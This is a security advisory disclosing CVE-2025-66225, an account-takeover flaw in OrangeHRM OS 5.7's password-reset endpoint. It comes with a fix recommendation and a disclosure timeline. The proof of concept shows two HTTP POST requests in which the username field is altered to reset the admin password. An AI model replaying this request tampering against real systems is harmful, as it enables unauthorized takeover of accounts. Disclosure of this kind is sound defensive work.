usd-2025-46 | OrangeHRM OS 5.7 - Authenticated Account Takeover via Insecure Password Reset
Product: OrangeHRM OS
Affected Version: 5.7
Vulnerability Type: Weak Password Recovery Mechanism for Forgotten Password (CWE-640)
Security Risk: High
Vendor: OrangeHRM Inc
Vendor URL: https://www.orangehrm.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: CVE-2025-66225
CVE Link: https://www.cve.org/CVERecord?id=CVE-2025-66225
Advisory ID: usd-2025-46
Description
OrangeHRM describes itself as a comprehensive Human Resource Management (HRM) System that captures all the essential functionalities required for any enterprise. OrangeHRM OS is its open source version.
Version 5.7 of OrangeHRM allows authenticated attackers to take over arbitrary other accounts, including administrative accounts, via a vulnerability in the password reset process.
Proof of Concept
First, a password reset is initiated for an arbitrary account to which the attacker has access via the Forgot your password? link on the login page. It is important that the account is configured such that the attacker receives the password reset e-mail. The password reset e-mail contains a link that marks the next step in the password reset process.
When completing the form, a request such as shown in the following listing is sent.
POST /web/index.php/auth/resetPassword HTTP/1.1 Host: 10.3.161.14 Cookie: _orangehrm=j5bqlmhnuhfg05oenp7n6cjkao Content-Type: application/x-www-form-urlencoded Content-Length: 204 [...]
_token=674e0cfd8763884[...]2yw&username=attacker&password=Password123456%21&confirmPassword=Password123456%21
The request contains the username for which the password is changed. That parameter can be changed arbitrarily in the request to reset the password of another user. For example, intercepting the above request and modifying it to the request shown in the following listing changes the password for the admin user.
POST /web/index.php/auth/resetPassword HTTP/1.1 Host: 10.3.161.14 Cookie: _orangehrm=j5bqlmhnuhfg05oenp7n6cjkao Content-Type: application/x-www-form-urlencoded Content-Length: 201 [...] _token=674e0cfd8763884[...]2yw&username=admin&password=Password123456%21&confirmPassword=Password123456%21
The attacker can now login into account admin with password Password123456!.
Note that the _token parameter is a CSRF-token. It is specifically scoped to that stage in the password reset process and can only be used once such that no other CSRF-token can be used. This is the reason why the resetPassword endpoint cannot be accessed without having an arbitrary but valid password reset link and thus requires attackers to have access to an arbitrary account first.
Fix
The resetPassword endpoint should verify that the username parameter matches to the one for which a password reset has been initiated via the reset link.
References
- https://github.com/orangehrm/orangehrm
- https://github.com/orangehrm/orangehrm/security/advisories/GHSA-5ghw-9775-v263
Timeline
- 2025-09-12: First contact request via e-mail.
- 2025-09-15: Vulnerability details have been transmitted through an encrypted channel.
- 2025-10-07: Asked vendor for an update.
- 2025-10-08: Vendor has confirmed the vulnerability and initiated remediation.
- 2025-11-11: Vendor has asked to extend the disclosure timeline while QA testing and finalizing the patch.
- 2025-11-11: We agreed to extend the timeline.
- 2025-11-28: The vendor has released a patch (v5.8)
- 2025-12-01: This advisory is published.
Credits
This security vulnerability was identified by Florian Dewald, Roman Hergenreder, Florian Kimmes, DR, Jakob Steeg, and Ole Wagner of usd AG.